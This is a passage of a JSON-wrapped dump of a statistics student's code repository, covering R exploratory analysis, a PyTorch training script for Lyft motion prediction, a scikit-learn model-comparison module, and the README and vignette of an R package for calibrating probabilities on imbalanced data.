boxplot(dat[,i] ~ dat[,32])\n}\n\n### imbalance label\ntable(dat[,32])\n\n############## explore categorical variable\ndat2 = read.csv(\"../data/test.csv\")\ntable(c(dat[,31],dat2[,31]))\nmax(table(c(dat[,31],dat2[,31]))) - min(table(c(dat[,31],dat2[,31])))\n## it seems like a uniform distribution on {A,B,C,D,E}\n## simulation\n{\n see = sample(1:5, 10000, T)\n table(see)\n max(table(see)) - min(table(see))\n}\n#### plot categorical variable with y\ncat0 = dat[dat$y == 0,]\ncat1 = dat[dat$y == 1,]\ntable(cat0[,31])\ntable(cat1[,31])\nbarplot(table(cat0[,31]))\nbarplot(table(cat1[,31]))\n## more CDE in class 0, more ABC in class1\n## think about how they generated abels using this categorical variable\n\n############# explore numeric variables\n### looks like normal and no correlations\nlibrary(nortest)\n### class 0\nfor (i in 1:30) {\n qqnorm(cat0[,i])\n qqline(cat0[,i])\n print(ad.test(cat0[,i]))\n}\n### class 1\nfor (i in 1:30) {\n 
qqnorm(cat1[,i])\n qqline(cat1[,i])\n print(ad.test(cat1[,i]))\n}\n### all training\nfor (i in 1:30) {\n qqnorm(dat[,i])\n qqline(dat[,i])\n print(ad.test(dat[,i]))\n}\n\n## compare with true normal\nfor (i in 1:30) {\n x = rnorm(3000)\n print(ad.test(x))\n qqnorm(x)\n qqline(x)\n}\n\n### cor\ncor(dat[,1:30])\n\n################# fit some model\nset.seed(1)\n### one hot encoder\nnewdat = dat[,1:30]\nnewdat[,31:35] = diag(rep(1,5))[as.numeric(dat[,31]),]\nnewdat[,36] = dat[,32]\n\n########## logistic + lasso\nlibrary(glmnet)\nmod = cv.glmnet(as.matrix(newdat[,1:35]), newdat[,36], family = \"binomial\",\n type.measure=\"class\")\nmod$lambda\nmod$cvm #### best error rate is 0.005000, smaller lambda gives better result\n\nmod2 = cv.glmnet(as.matrix(newdat[,1:30]), newdat[,36], family = \"binomial\",\n type.measure=\"class\")\nmod2$lambda\nmod2$cvm #### best error rate is 0.005000, smaller lambda gives better result\n\n\n## coefficients\nView(as.matrix(mod$glmnet.fit$beta)[,100])\n## it seems the coefficients are -2,-1,0,1,2\n\n\nlibrary(mda)\n########### MDA\ntrain_index = sample(1:3000, 2700)\ntrain = newdat[train_index,]\ntest = newdat[-train_index,]\n\n?mda\nmdamod = mda(V36~., data = train[,-(31:35)])\nmdamod = mda(y~., data = dat[,-(31)])\nmda_pred = predict(mdamod,test[,-(31:35)])\nloss = function(y, y_p){\n mean(y != y_p)\n}\nloss(mda_pred, test[,36]) ### error rate is about 0.1\n" }, { "alpha_fraction": 0.5866232514381409, "alphanum_fraction": 0.6037379503250122, "avg_line_length": 33.89011001586914, "blob_id": "74974527a4a7189d2d5afaac217a5571c96db2ef", "content_id": "80cb4f54e96d8142750de0807b5aa6c13e67ba56", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9524, "license_type": "no_license", "max_line_length": 140, "num_lines": 273, "path": "/lyft/train.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "from typing import Dict\n\nfrom tempfile import gettempdir\nimport 
matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport torch\nfrom torch import nn, optim\nfrom torch.utils.data import DataLoader\nfrom torchvision.models.resnet import resnet50, resnet18, resnet34, resnet101\nfrom efficientnet_pytorch import EfficientNet\nfrom tqdm import tqdm\n\nimport l5kit\nfrom l5kit.configs import load_config_data\nfrom l5kit.data import LocalDataManager, ChunkedDataset\nfrom l5kit.dataset import AgentDataset, EgoDataset\nfrom l5kit.rasterization import build_rasterizer\nfrom l5kit.evaluation import write_pred_csv, compute_metrics_csv, read_gt_csv, create_chopped_dataset\nfrom l5kit.evaluation.chop_dataset import MIN_FUTURE_STEPS\nfrom l5kit.evaluation.metrics import neg_multi_log_likelihood, time_displace, average_displacement_error_mean, final_displacement_error_mean\nfrom l5kit.geometry import transform_points\nfrom l5kit.visualization import PREDICTED_POINTS_COLOR, TARGET_POINTS_COLOR, draw_trajectory\nfrom prettytable import PrettyTable\nfrom pathlib import Path\n\nimport matplotlib.pyplot as plt\n\nimport os\nimport random\nimport time\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n\nfrom tensorboardX import SummaryWriter\nfrom json import dumps\nfrom adamp import AdamP\n\nimport utils\nfrom models import LyftEffnet\nfrom utils import forward\n\n### =============== Configurations ============= ###\ncfg = {\n 'format_version': 4,\n 'data_path': \"input/lyft-motion-prediction-autonomous-vehicles\",\n 'save_dir': \"./save/\",\n 'name': 'effnetb4_300',\n 'gpu_ids': [4, 5, 6, 7],\n 'seed': 2, \n 'load_path': \"\", \n 'model_params': {\n # 'model_architecture': 'resnet50',\n 'history_num_frames': 10,\n 'history_step_size': 1,\n 'history_delta_time': 0.1,\n 'future_num_frames': 50,\n 'future_step_size': 1,\n 'future_delta_time': 0.1,\n 'model_name': \"effnetb4_300\",\n 'lr': 1e-4,\n 'train': True,\n 'predict': False,\n },\n\n 'raster_params': {\n 'raster_size': [300, 300],\n 'pixel_size': [0.5, 0.5],\n 
'ego_center': [0.25, 0.5],\n 'map_type': 'py_semantic',\n 'satellite_map_key': 'aerial_map/aerial_map.png',\n 'semantic_map_key': 'semantic_map/semantic_map.pb',\n 'dataset_meta_key': 'meta.json',\n 'filter_agents_threshold': 0.5\n },\n\n 'train_data_loader': {\n 'key': 'scenes/train.zarr',\n 'batch_size': 64, # 16\n 'shuffle': True,\n 'num_workers': 16 # 4\n },\n \n 'val_data_loader': {\n 'dir': 'input/lyft-motion-prediction-autonomous-vehicles/scenes/validate_chopped_100',\n 'key': 'scenes/validate_chopped_100/validate.zarr',\n 'batch_size': 64,\n 'shuffle': False,\n 'num_workers': 16 # 4\n },\n\n 'test_data_loader': {\n 'key': 'scenes/test.zarr',\n 'batch_size': 32,\n 'shuffle': False,\n 'num_workers': 16 # 4\n },\n\n 'train_params': {\n 'max_num_steps': 12000000,\n 'eval_steps': 160000,\n 'max_grad_norm': 5.0,\n }\n}\n\ndef main(cfg):\n\n # set logger, tensorboard, and devices\n cfg['save_dir'] = utils.get_save_dir(cfg['save_dir'], cfg['name'], training=True)\n log = utils.get_logger(cfg[\"save_dir\"], cfg[\"name\"])\n tbx = SummaryWriter(cfg[\"save_dir\"])\n device = utils.get_devices(cfg[\"gpu_ids\"])\n cfg[\"train_data_loader\"][\"batch_size\"] *= max(1, len(cfg[\"gpu_ids\"]))\n cfg[\"val_data_loader\"][\"batch_size\"] *= max(1, len(cfg[\"gpu_ids\"]))\n\n log.info(f\"Cfg: {dumps(cfg, indent = 4, sort_keys = True)}\")\n\n\n # get model\n log.info(\"Building model...\")\n model = LyftEffnet(cfg)\n model = nn.DataParallel(model, device_ids=cfg[\"gpu_ids\"])\n if cfg[\"load_path\"]:\n # reset the seed to sample some other data\n cfg[\"seed\"] *= 2\n log.info(f\"Loading checkpoint from {cfg['load_path']}...\")\n model, step = utils.load_model(model, cfg[\"load_path\"], cfg[\"gpu_ids\"])\n else:\n step = 0\n model = model.to(device)\n model.train()\n\n\n # set random seed\n log.info(f\"Using random seed {cfg['seed']}\")\n utils.set_seed(cfg[\"seed\"])\n\n # get saver\n saver = utils.CheckpointSaver(cfg[\"save_dir\"], log = log)\n\n # get optimizer\n optimizer = 
optim.Adam(model.parameters(), lr=cfg[\"model_params\"][\"lr\"])\n # optimizer = AdamP(model.parameters(), lr = 1e-4, weight_decay=1e-2)\n # optimizer = optim.SGD(model.parameters(), lr = 1e-4, momentum=0.9)\n # optimizer = optim.SGD(model.parameters(), lr = 5e-5, momentum=0.9)\n # optimizer = optim.SGD(model.parameters(), lr = 1e-5, momentum=0.9)\n\n # get dataloader\n DIR_INPUT = cfg[\"data_path\"]\n os.environ[\"L5KIT_DATA_FOLDER\"] = DIR_INPUT\n dm = LocalDataManager(None)\n\n log.info(\"Building training dataset...\")\n train_cfg = cfg[\"train_data_loader\"]\n rasterizer = build_rasterizer(cfg, dm)\n train_zarr = ChunkedDataset(dm.require(train_cfg[\"key\"])).open()\n train_dataset = AgentDataset(cfg, train_zarr, rasterizer)\n train_dataloader = DataLoader(train_dataset, shuffle=train_cfg[\"shuffle\"], batch_size=train_cfg[\"batch_size\"], \n num_workers=train_cfg[\"num_workers\"], pin_memory=True)\n log.info(str(train_dataset))\n\n log.info(\"Building validation dataset...\")\n val_cfg = cfg[\"val_data_loader\"]\n val_zarr = ChunkedDataset(dm.require(val_cfg[\"key\"])).open()\n val_mask = np.load(f\"{val_cfg['dir']}/mask.npz\")[\"arr_0\"]\n val_dataset = AgentDataset(cfg, val_zarr, rasterizer, agents_mask=val_mask)\n val_dataloader = DataLoader(val_dataset, shuffle=val_cfg[\"shuffle\"], batch_size=val_cfg[\"batch_size\"],\n num_workers=val_cfg[\"num_workers\"], pin_memory=True)\n log.info(str(val_dataset))\n\n\n # Train\n log.info(\"Training...\")\n tr_it = iter(train_dataloader)\n max_steps = cfg[\"train_params\"][\"max_num_steps\"]\n losses_train = []\n steps_till_eval = cfg[\"train_params\"]['eval_steps']\n with torch.enable_grad(), tqdm(total=max_steps) as progress_bar:\n while step < max_steps:\n try:\n data = next(tr_it)\n except StopIteration:\n tr_it = iter(train_dataloader)\n data = next(tr_it)\n \n # forward pass\n loss, _, _, batch_size = forward(data, model, device)\n\n # Backward pass\n optimizer.zero_grad()\n loss.backward()\n 
nn.utils.clip_grad_norm_(model.parameters(), cfg['train_params']['max_grad_norm'])\n optimizer.step()\n\n losses_train.append(loss.item())\n\n # log info\n step += batch_size\n progress_bar.update(batch_size)\n progress_bar.set_description(f\"loss: {loss.item()} loss(avg): {np.mean(losses_train)}\")\n tbx.add_scalar('train/loss', loss, step)\n\n steps_till_eval -= batch_size\n if steps_till_eval <= 0:\n steps_till_eval = cfg[\"train_params\"][\"eval_steps\"]\n\n # Evaluate and save checkpoint\n log.info(f\"Evaluate at step {step}...\")\n metrics = evaluate(model, val_dataloader, device)\n saver.save(step, model, metrics['neg_multi_log_likelihood'], device)\n\n # Log to console\n metrics_str = ', '.join(f\"{k}: {v:05.2f}\" for k, v in metrics.items())\n log.info(f\"Validate {metrics_str}\")\n\n # Log to tensorboard\n log.info(\"Visualizing in Tensorboard...\")\n for k, v in metrics.items():\n tbx.add_scalar(f\"val/{k}\", v, step)\n\n\ndef evaluate(model, data_loader, device):\n model.eval()\n # store information for evaluation\n future_coords_offsets_pd = []\n timestamps = []\n confidences_list = []\n agent_ids = []\n\n progress_bar = tqdm(data_loader)\n\n with torch.no_grad():\n for data in progress_bar:\n\n _, preds, confidences, _ = forward(data, model, device)\n\n #fix for the new environment\n preds = preds.cpu().numpy()\n world_from_agents = data[\"world_from_agent\"].numpy()\n centroids = data[\"centroid\"].numpy()\n \n # convert into world coordinates and compute offsets\n for idx in range(len(preds)):\n for mode in range(3):\n preds[idx, mode, :, :] = transform_points(preds[idx, mode, :, :], world_from_agents[idx]) - centroids[idx][:2]\n \n future_coords_offsets_pd.append(preds.copy())\n confidences_list.append(confidences.cpu().numpy().copy()) \n timestamps.append(data[\"timestamp\"].numpy().copy()) \n agent_ids.append(data[\"track_id\"].numpy().copy())\n \n model.train()\n\n pred_path = os.path.join(cfg['save_dir'], \"pred.csv\")\n\n 
write_pred_csv(pred_path, \n timestamps=np.concatenate(timestamps), \n track_ids=np.concatenate(agent_ids), \n coords=np.concatenate(future_coords_offsets_pd),\n confs = np.concatenate(confidences_list)\n )\n val_gt_path = f\"{cfg['val_data_loader']['dir']}/gt.csv\"\n # metrics reference: https://github.com/lyft/l5kit/blob/380097ebd1937835d1c13ff5ec831610d42b6f73/l5kit/l5kit/evaluation/metrics.py\n metrics = compute_metrics_csv(val_gt_path, pred_path, \n [neg_multi_log_likelihood, average_displacement_error_mean, \n final_displacement_error_mean])\n \n return metrics\n\nif __name__ == '__main__':\n main(cfg)" }, { "alpha_fraction": 0.6337346434593201, "alphanum_fraction": 0.6360953450202942, "avg_line_length": 33.434959411621094, "blob_id": "fefed4882755dc0249c63c120807b22ff86ef3d9", "content_id": "89d6c08840b4e050c7a7646ada803ad163b207c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8472, "license_type": "no_license", "max_line_length": 112, "num_lines": 246, "path": "/wellsfargo/solution/code/models.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\nfrom sklearn.model_selection import cross_val_score, cross_validate\nfrom sklearn.model_selection import RepeatedStratifiedKFold, KFold\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.svm import LinearSVC\nfrom sklearn.preprocessing import LabelEncoder\nfrom lightgbm import LGBMClassifier\nfrom xgboost import XGBClassifier\nfrom catboost import CatBoostClassifier\n\n\ndef encode(data, method=\"ordinal\"):\n \"\"\"Encode categorical columns in the dataset.\n\n Parameters\n ----------\n data: dataframe\n The 
dataset to be encoded.\n\n method: str, {'onehot', 'ordinal'}, default='ordinal'\n The encoding method.\n\n Returns\n -------\n data:\n The encoded dataset.\n \"\"\"\n assert method in (['ordinal', 'onehot'])\n if method == 'onehot':\n var_dummies = pd.get_dummies(data['XC'], prefix = 'X')\n data = pd.concat([data, var_dummies], axis=1)\n data.drop(columns=['XC'], inplace=True)\n if method == 'ordinal':\n data['XC'] = pd.factorize(data['XC'], sort=True)[0]\n \n return data\n\n\ndef model_init(model_type, **params):\n \"\"\" Initialize a model according to the model name.\n\n Parameters\n ----------\n model_type: {'LR', 'LDA', 'KNN', 'CART', 'NB', 'SVM', 'LGBM', \\\n 'XGBoost', 'CatBoost'}\n The type of the model to initialize.\n\n params: dictionary\n A dictionary of parameters for the specified model.\n\n Returns\n -------\n model:\n An initialized model.\n \"\"\"\n\n model_candidates = ['LR', 'LDA', 'KNN', 'CART', 'NB', 'SVM', 'LGBM', \\\n 'XGBoost', 'CatBoost']\n if model_type not in model_candidates:\n raise ValueError(f\"Model should be one of {model_candidates}.\\n\")\n\n if model_type == 'LR':\n model = LogisticRegression(**params)\n elif model_type == 'LDA':\n model = LinearDiscriminantAnalysis(**params)\n elif model_type == 'KNN': \n model = KNeighborsClassifier(**params)\n elif model_type == 'CART': \n model = DecisionTreeClassifier(**params)\n elif model_type == 'NB': \n model = GaussianNB(**params)\n elif model_type == 'SVM':\n model = LinearSVC(**params)\n elif model_type == 'LGBM':\n model = LGBMClassifier(**params)\n elif model_type == 'XGBoost':\n model = XGBClassifier(**params)\n elif model_type == 'CatBoost':\n model = CatBoostClassifier(**params)\n \n return model\n\n\ndef model_eval(X, y, model_type, scoring, seed, **params):\n \"\"\" Evaluate a single model using cross-validation.\n\n The cross validation used here is RepeatedStratifiedKFold. 
Refer to \\\n https://scikit-learn.org/stable/modules/generated/sklearn.model_selection.RepeatedStratifiedKFold.html \\\n for more details.\n\n Parameters\n ----------\n X: ndarray of shape (n, dx)\n The predicting feature matrix.\n \n y: ndarray of shape (n, )\n The response.\n\n model_type: {'LR', 'LDA', 'KNN', 'CART', 'NB', 'SVM', 'LGBM', \\\n 'XGBoost', 'CatBoost'}\n The type of the model to evaluate.\n \n scoring: {'accuracy', 'f1', 'f1_weighted', 'precision', 'recall', \\\n 'roc_auc', 'neg_log_loss', 'neg_brier_score'}\n The scoring metric to evaluate in cv.\n \n seed: int\n The seed to assure the same cross validation fold splitting.\n \n params: dictionary\n The parameter specification for the model.\n\n Returns\n -------\n No returns. Print out the mean and stanndard error of the cv results.\n\n References\n ----------\n https://scikit-learn.org/stable/modules/model_evaluation.html\n \"\"\"\n model = model_init(model_type, **params)\n cv = RepeatedStratifiedKFold(n_splits=10, n_repeats=5, random_state=seed)\n cv_results = cross_val_score(model, X, y, cv=cv, scoring=scoring)\n msg = \"%s: %f (%f)\" % (model_type, cv_results.mean(), cv_results.std())\n print(msg)\n\n\ndef model_compare(X, y, model_types, model_params, model_names, scoring, \\\n image_dir='../images', display=True, seed=99):\n \"\"\" Compare multiple models in terms of scoring, using cross validation.\n \n The cross validation used here is RepeatedStratifiedKFold. \n \n Parameters\n ----------\n X: ndarray of shape (n, dx)\n The predicting feature matrix.\n \n y: ndarray of shape (n, )\n The response.\n \n model_types: list of str\n A list of model types. 
Refer to model_init() to see candidate models.\n \n model_params: list of dictionary\n A list of model parameters, and model parameters are specified by dictionaries.\n Should be of the same length as model_types.\n\n model_names: list of str\n A list of model names, corresponding to the models in model_types.\n Should be of the same length as model_types and model_params.\n\n scoring: a dictionary of multiple scoring metrics.\n Example: scoring = {'auc': 'roc_auc', 'accuracy': 'accuracy'}\n The scoring metrics to evaluate in cv.\n \n image_dir: a str\n The path to save the generated images.\n\n display: bool\n Whether or not to display the figures.\n\n seed: int\n The seed to assure the same cross validation fold splitting.\n \n Returns\n -------\n results: a list of dictionary\n Each element is a dictionary containing the cross validation results.\n \n compare_df: a dataframe\n Columns represent the metrics and indices correspond to model names.\n Each entry is a string containing the mean and standard deviation of the cv results.\n \n compare_plot_df: a dataframe\n Columns represent model names and indices are the metrics.\n Each entry is the mean of the corresponding cv results.\n This dataframe is used for generating comparison plots.\n\n A model comparison diagram of model comparison would be displayed and saved to \\\n the image folder.\n With respect to each scoring metric, one boxplot comparison diagram would be \\\n displayed and saved to the image folder.\n \"\"\"\n if not os.path.exists(image_dir):\n os.makedirs(image_dir)\n \n results = []\n compare_df = pd.DataFrame(columns = list(scoring.keys()), \\\n index = model_names)\n # create compare_plot_df for plotting\n compare_plot_df = pd.DataFrame(columns = model_names, \\\n index = list(scoring.keys()))\n\n cv = RepeatedStratifiedKFold(n_splits=10, n_repeats=5, random_state=seed)\n \n for model_type, params, model_name in zip(model_types, model_params, model_names):\n print(f\"Running {model_name}...\", 
end='\\t')\n model = model_init(model_type, **params)\n cv_results = cross_validate(model, X, y, cv=cv, scoring=scoring)\n results.append(cv_results)\n cv_metrics = [f\"{cv_results[key].mean(): .5f} ({cv_results[key].std(): .5f})\"\\\n for key in cv_results.keys() if key.startswith('test')]\n compare_df.loc[model_name] = cv_metrics\n\n compare_plot_df[model_name] = [cv_results[key].mean()\\\n for key in cv_results.keys() if key.startswith('test')]\n print(f\"{model_name} done!\")\n \n # plot the model comparison results using mean metrics\n plt.rcParams[\"figure.figsize\"] = (10,8)\n plt.figure()\n compare_plot_df.plot()\n plt.legend(loc='best')\n plt.savefig(f\"{image_dir}/model_compare.pdf\")\n print(f\"Model Comparison Diagram\")\n print(f\"It has been saved to '{image_dir}/model_compare.pdf'.\")\n if display:\n plt.show()\n else:\n plt.close()\n \n # plot boxplot comparison diagrams with respect to each metric\n for key in scoring.keys():\n fig = plt.figure()\n fig.suptitle(f'Model Comparison w.r.t. 
{key}')\n ax = fig.add_subplot(111)\n plt.boxplot([results[i][f\"test_{key}\"] for i in range(len(results))])\n ax.set_xticklabels(model_names)\n plt.savefig(f\"{image_dir}/model_compare_{key}.pdf\")\n print(f\"Boxplot for algorithm comparison in terms of {key}.\")\n print(f\"It has been saved to '{image_dir}/model_compare_{key}.pdf'.\")\n if display:\n plt.show()\n else:\n plt.close()\n \n return results, compare_df, compare_plot_df\n\n" }, { "alpha_fraction": 0.7527901530265808, "alphanum_fraction": 0.7868303656578064, "avg_line_length": 46.18421173095703, "blob_id": "6f5ca9b5b86ac146ad6e4d41c9c02d85b2e7d5a1", "content_id": "36cf30d5c72b32f6ae8013210bf835c98e0b5e40", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1794, "license_type": "no_license", "max_line_length": 313, "num_lines": 38, "path": "/imbCalib/README.md", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "# R package: imbCalib\n\nThis is a class project for STAT 8054 (Statistical Methods IV).\n\nThis package intends to calibrate probabilities for imbalanced data. The method is to do bagging over undersampled datasets, and hence to mitigate the bias of probability calibration induced by the imbalance of the dataset. Refer to [Wallace et.al 2014](https://doi.org/10.1007/s10115-013-0670-6) for more detail.\n\n## Datasets\n`imbalance`: An imbalanced dataset with 8 covariates and 1 binary response. 
There are about 5% samples in the positive class.\n\n## Functions\n- `binProbs`: generate binned probabilities.\n- `brier`: calculate standard Brier score.\n- `stratifiedBrier`: calculate stratified Brier score.\n- `undersample`: generate an undersampled dataset.\n- `bagCalibrate`: perform bagged undersampled calibration\n - Support logistic regression, naive Bayes, random forest, and svm currently.\n- `calibCurve`: plot calibration curve.\n- `comparisonPlot`: plot calibration curves by several calibrated probabilities.\n\n## Vignettes\n\nCheck the link: [Vignette: Getting started with imbCalib](https://yuyangyy.com/assets/courses/files/vignette-imbcalib.html).\n\nOr, install the package and then\n```r\nbrowseVignettes(\"imbCalib\")\n```\n\n## References:\n\nWallace, B.C., Dahabreh, I.J. Improving class probability estimates for imbalanced data. Knowl Inf Syst 41, 33–52 (2014). https://doi.org/10.1007/s10115-013-0670-6\n\n## Helpful Resources to understand probability calibration\n[The Basics of Classifier Evaluation: Part 2](http://www.svds.com/classifiers2/)\n\n[How to Calibrate Probabilities for Imbalanced Classification](https://machinelearningmastery.com/probability-calibration-for-imbalanced-classification/)\n\n[Calibration of probabilities for tree-based models](https://gdmarmerola.github.io/probability-calibration/)" }, { "alpha_fraction": 0.6904016733169556, "alphanum_fraction": 0.7168710231781006, "avg_line_length": 53.9953498840332, "blob_id": "62d720007ce88e192bdc3977a3768807e3a8bdf7", "content_id": "f0d2dc5bade225e3c57d9a30d5592124a1aabcfc", "detected_licenses": [], "is_generated": false, "is_vendor": true, "language": "RMarkdown", "length_bytes": 11831, "license_type": "no_license", "max_line_length": 696, "num_lines": 215, "path": "/imbCalib/package/imbCalib/vignettes/get-started.Rmd", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "---\ntitle: \"Getting started with imbCalib\"\nauthor: \"Yu Yang\"\ndate: \"`r 
Sys.Date()`\"\noutput: rmarkdown::html_vignette\nvignette: >\n %\\VignetteIndexEntry{Getting started with imbCalib}\n %\\VignetteEngine{knitr::rmarkdown}\n %\\VignetteEncoding{UTF-8}\n---\n\n```{r setup, include = FALSE}\nknitr::opts_chunk$set(\n collapse = TRUE,\n comment = \">\",\n warning = FALSE, \n cache = TRUE\n)\nrequire('pacman')\npacman::p_load(pROC, mltools, caTools, e1071, randomForest, foreach, doParallel, abind, imbCalib)\n```\n\nWhen doing classification, we not only want the prediction results, but also the corresponding probabilty of the decision. The ideal probability shall give us a sense of confidence about the predicted labels. For example, given a sample, if the probability for the prediction is 80%, then approximately 80% samples with the same features actually have the predicted label. For applications where we need to use confidence to support decision making, it is vital to have good estimates of probabilities.\n\nBut unlike logistic regression, where the prediction is based on probabilities, many supervised learning methods don't come natually with probabilities. For example, Support Vector Machine is performed based on margins, instead of probabilities. The probabilities given by SVM model is actually calibrated using Platt's scaling. Another commonly used calibration method is Isotonic regression. Check [Niculescu-Mizil and Caruana 2005](https://www.cs.cornell.edu/~alexn/papers/calibration.icml05.crc.rev3.pdf) for more details.\n\nOne big issue of these methods is that they only work for balanced data, and when it comes to the imbalanced data case, they usually underestimate the probabilities for the minority class instances. To solve this problem, [Wallace and Dahabreh 2014](https://link.springer.com/article/10.1007%2Fs10115-013-0670-6) proposed using bagged undersampled method to calibrate probabilities. 
And this is the methodology basis of this package.\n\n## Imbalanced Dataset\nClass imbalance happens when the number of instances in each class is not equal. And in the imbalanced scenario, the rare events are usually misclassified. Imbalance would affect not only classfication results, but also probability calibration.\n\nA synthesized imbalanced dataset `imbalance` is provided in this package and it can be loaded with `data(imbalance)`. In this dataset, about 5% are in the positive class. There are 8 covariates and 1 binary response. The positive label is 1. \n\n```{r show-data}\ndata(imbalance)\nnames(imbalance)\nmean(imbalance$y)\n```\n\n## Metrics\n\n### Why AUC is not enough?\nIn the evaluation of model performances, accuracy is not enough for classification problems, and AUC can provide us more information. But AUC itself is not enough to evaluate the goodness of probability calibration. \n\nThe following example illustrates that the scale of the probabilities would not affect AUC. Two sets of probabilities can have the same AUC, while they show different levels of confidence. 
Therefore, AUC is not appropriate to evaluate the goodness of probability calibration.\n\n```{r example-auc, fig.height = 5, fig.width = 5}\n# simulate data\nthreshold <- 0.6\nset.seed(99)\ny.true <- (runif(10) > threshold) * 1\nset.seed(92)\ny.prob <- runif(10) \ny.pred <- (y.prob > threshold) * 1\n\n# print out the simulated data\ny.true\ny.prob\ny.pred\n\n# auc in the original scale\nauc(roc(y.true, y.prob, direction = \"<\", quiet = TRUE))\n\n# auc using the rank of the probabilities\nauc(roc(y.true, rank(y.prob), direction = \"<\", quiet = TRUE))\n\n# auc using the probability-like rank\nauc(roc(y.true, rank(y.prob) / 50, direction = \"<\", quiet = TRUE))\n\n# plot kernel density\nplot(density(y.prob), col = 'red', main = 'Kernel Density Curve', xlab = 'Probability Value', xlim = c(-0.5, 1.5), ylim = c(0, 5.5), lty = 1)\nlines(density(rank(y.prob) / 50), col = 'blue', lty = 1)\nlegend('topright', legend = c(\"Original Probability\", \"Rescaled Probability\"), \n col = c('red', 'blue'), lty = c(1, 1))\n```\n\n### Brier Score\n\nBrier score measures the fit of probability estimates to the observed data. It is defined as the mean squared difference between the observed labels and the estimated probability. A smaller value means a better calibration.\n$$BS = \\frac{\\sum_{i=1}^N (y_i - \\hat{P}(y_i | x_i))^2}{N}$$\n\nTo obtain the standard Brier score, run `brier` function. The first argument should be the true labels, and the second argument should be the calibrated probabilities.\n\n```{r brier}\ny.prob <- c(0.45454545, 0.36363636, 0.63636364, 0.18181818, 0.45454545, 0.09090909,\n 0.27272727, 0.81818182, 0.63636364, 0.63636364)\ny.true <- c(0, 0, 1, 1, 0, 1, 1, 0, 0, 0)\nbrier(y.true, y.prob)\n```\n\n### Stratified Brier Score\n\nStratified Brier Score was proposed by [Wallace and Dahabreh 2014](https://link.springer.com/article/10.1007%2Fs10115-013-0670-6) to evaluate the goodness of calibration under the imbalanced scenario. 
Unlike the standard Brier score, which only considers the overall matching, it takes care of both the minority and the majority class. It consists of two parts: Brier score for the positive class, and Brier score for the negative class. They are defined as follows. \n$$BS^+ = \\frac{\\sum_{y_i=\\text{pos_label}} (y_i - \\hat{P}(y_i | x_i))^2}{N_{pos}}$$\n$$BS^- = \\frac{\\sum_{y_i=\\text{neg_label}} (y_i - \\hat{P}(y_i | x_i))^2}{N_{pos}}$$\n\n`stratifiedBrier` function would output a list with three elements: the overall Brier score, the positive Brier socre, as well as the negative Brier score.\n\n```{r}\nstratifiedBrier(y.true, y.prob)\n```\n\n## Calibration Curve\nVisualization usually helps us better understand the problem of the model more quickly and intuitively. In this package, `calibCurve` shows two plots: the top one is the calibration curve along with a perfectly calibrated dashed line, and the bottom one is the histogram of the calibrated probabilities. The corresponding Brier score is shown in the legend. `comparisonPlot` plots the calibration curves from several models or from several calibration methods. \n\nWe now use the dataset `imbalance` to see how the two plotting functions work. In the following, we consider four models: Logistic Regression, Naive Bayes Classifier, Random Forest Classifier, and Support Vector Machine(SVM). For simplity, the default parameters are used. For each model, we plot their individual calibration curve respectively, and then draw a comparison plot. 
\n\n```{r data}\n# load the dataset and split into train and test\ndata(imbalance)\nset.seed(123)\nsplit <- sample.split(imbalance$y, SplitRatio = 0.75)\ntrain_set <- subset(imbalance, split == TRUE)\ntest_set <- subset(imbalance, split == FALSE)\nX.test <- subset(test_set, select = -y)\ny.test <- subset(test_set, select = y)[,1]\n```\n\n\n```{r lr, fig.height = 6, fig.width = 4.5}\n# Logistic Regression\nlr <- glm(y ~ ., data = train_set, family = \"binomial\")\nprob.lr <- predict(lr, X.test, type = \"response\")\ncalibCurve(y.test, prob.lr, \"Logistic\")\n```\n\n```{r nnb, fig.height = 6, fig.width = 4.5}\n# Naive Bayes\nnb <- naiveBayes(y ~ ., data = train_set)\nprob.nb <- as.data.frame(predict(nb, X.test, type = \"raw\"))$`1`\ncalibCurve(y.test, prob.nb, \"Naive Bayes\")\n```\n\n```{r rfc, fig.height = 6, fig.width = 4.5}\n# Random Forest Classifier\nrfc <- randomForest(as.factor(y) ~ ., data = train_set)\nprob.rfc <- as.data.frame(predict(rfc, X.test, type = \"prob\"))$`1`\ncalibCurve(y.test, prob.rfc, \"Random Forest\")\n```\n\n```{r svc, fig.height = 6, fig.width = 4.5}\n# Support Vector Machine Classifier\nsvc <- svm(formula = as.factor(y) ~ ., \n data = train_set, \n type = 'C-classification', \n kernel = 'linear', probability = TRUE) \npred <- predict(svc, X.test, probability = TRUE)\nprob.svc <- as.data.frame(attr(pred, \"probabilities\"))$`1`\ncalibCurve(y.test, prob.svc, \"SVM\")\n```\n\n```{r comparison, fig.height = 5, fig.width = 5}\ncomparisonPlot(y.test, list(prob.lr, prob.nb, prob.rfc, prob.svc), \n c(\"Logistic Regression\", \"Naive Bayes\", \"Random Forest\", \"SVM\"))\n```\n\n## Bagged Undersampled Calibration\n\n`bagCalibrate` uses the bagged undersampled method to calibrate the probabilities for imbalanced datasets. There are two versions of bagging combination: the weighted average and the simple average, as defined below. To choose which version to use, specify the `ntimes` argument. When `ntimes = 1`, it is the simple average. 
